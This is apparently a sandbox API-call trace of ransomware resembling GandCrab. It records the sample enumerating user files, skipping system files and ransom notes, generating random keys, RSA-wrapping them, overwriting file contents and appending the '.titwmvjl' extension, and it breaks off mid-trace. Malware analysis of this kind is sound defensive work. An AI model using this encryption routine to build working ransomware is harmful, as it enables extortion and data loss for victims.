wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".png ") returned 5 [0070.234] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0070.234] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png") returned 56 [0070.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png") returned 56 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="desktop.ini") returned 1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="autorun.inf") returned 1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="ntuser.dat") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="iconcache.db") returned 1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="bootsect.bak") returned 1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="boot.ini") returned 1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="ntuser.dat.log") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="thumbs.db") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="KRAB-DECRYPT.html") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="CRAB-DECRYPT.html") returned 1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="ntldr") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="NTDETECT.COM") returned -1 [0070.234] lstrcmpiW (lpString1="JBi-kk0FV6SxVr.png", lpString2="Bootfont.bin") returned 1 [0070.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png") returned 56 [0070.234] lstrlenW (lpString=".png") returned 4 [0070.235] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.235] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".png ") returned 5 [0070.235] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.235] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.235] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jbi-kk0fv6sxvr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.235] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.236] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.236] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.236] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.237] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.237] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.237] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.237] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.238] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.238] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.238] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.238] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.238] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.239] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.239] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.239] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.239] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.239] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.240] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0070.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.240] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.240] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.241] GetLastError () returned 0x0 [0070.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.241] CryptDestroyKey (hKey=0x5036f8) returned 1 [0070.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.241] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.241] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.242] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503238) returned 1 [0070.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.242] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.242] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.242] GetLastError () returned 0x0 [0070.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.242] CryptDestroyKey (hKey=0x503238) returned 1 [0070.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.243] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.243] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.243] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.243] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x2f95, lpOverlapped=0x0) returned 1 [0070.248] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffd06b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x2f95, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x2f95, lpOverlapped=0x0) returned 1 [0070.252] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.254] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.257] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.257] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.257] CloseHandle (hObject=0x2b4) returned 1 [0070.259] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jbi-kk0fv6sxvr.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jbi-kk0fv6sxvr.png.titwmvjl"), dwFlags=0x1) returned 1 [0070.259] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.259] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.259] lstrcmpW (lpString1="JYaG7q.mp3", lpString2=".") returned 1 [0070.259] lstrcmpW (lpString1="JYaG7q.mp3", lpString2="..") returned 1 [0070.259] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="JYaG7q.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3" [0070.259] lstrlenW (lpString=".titwmvjl") returned 9 [0070.259] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3") returned 48 [0070.260] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.260] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3.titwmvjl") returned 57 [0070.260] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3") returned 48 [0070.260] lstrlenW (lpString=".mp3") returned 4 [0070.260] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.260] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0070.260] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0070.260] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.260] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3") returned 48 [0070.260] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3") returned 48 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="desktop.ini") returned 1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="autorun.inf") returned 1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="ntuser.dat") returned -1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="iconcache.db") returned 1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="bootsect.bak") returned 1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="boot.ini") returned 1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="ntuser.dat.log") returned -1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="thumbs.db") returned -1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.260] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.261] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="ntldr") returned -1 [0070.261] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="NTDETECT.COM") returned -1 [0070.261] lstrcmpiW (lpString1="JYaG7q.mp3", lpString2="Bootfont.bin") returned 1 [0070.261] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3") returned 48 [0070.261] lstrlenW (lpString=".mp3") returned 4 [0070.261] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.261] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0070.261] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.261] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.261] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jyag7q.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.261] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.261] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.262] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.262] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.262] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.263] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.263] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.263] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.263] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.263] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.263] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.263] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.263] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.264] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.264] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.264] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.264] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.264] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.264] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.264] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.265] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.265] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.265] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.265] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0070.265] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.265] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.265] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.266] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.266] GetLastError () returned 0x0 [0070.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.266] CryptDestroyKey (hKey=0x503378) returned 1 [0070.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.266] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.266] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.267] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503838) returned 1 [0070.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.267] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.267] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.267] GetLastError () returned 0x0 [0070.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.268] CryptDestroyKey (hKey=0x503838) returned 1 [0070.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.268] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.268] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.268] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.268] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x11ece, lpOverlapped=0x0) returned 1 [0070.277] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffee132, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x11ece, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x11ece, lpOverlapped=0x0) returned 1 [0070.279] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.288] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.291] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.292] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.292] CloseHandle (hObject=0x2b4) returned 1 [0070.294] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jyag7q.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JYaG7q.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jyag7q.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0070.294] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.294] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.294] lstrcmpW (lpString1="KZcK3fz60H0aS.mp3", lpString2=".") returned 1 [0070.294] lstrcmpW (lpString1="KZcK3fz60H0aS.mp3", lpString2="..") returned 1 [0070.295] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="KZcK3fz60H0aS.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3" [0070.295] lstrlenW (lpString=".titwmvjl") returned 9 [0070.295] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3") returned 55 [0070.295] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.295] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3.titwmvjl") returned 64 [0070.295] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3") returned 55 [0070.295] lstrlenW (lpString=".mp3") returned 4 [0070.295] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.295] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0070.295] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0070.295] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.295] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3") returned 55 [0070.295] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3") returned 55 [0070.295] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="desktop.ini") returned 1 [0070.295] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="autorun.inf") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="ntuser.dat") returned -1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="iconcache.db") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="bootsect.bak") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="boot.ini") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="ntuser.dat.log") returned -1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="thumbs.db") returned -1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="ntldr") returned -1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="NTDETECT.COM") returned -1 [0070.296] lstrcmpiW (lpString1="KZcK3fz60H0aS.mp3", lpString2="Bootfont.bin") returned 1 [0070.296] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KZcK3fz60H0aS.mp3") returned 55 [0070.296] lstrlenW (lpString=".mp3") returned 4 [0070.296] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.296] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0070.296] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.296] 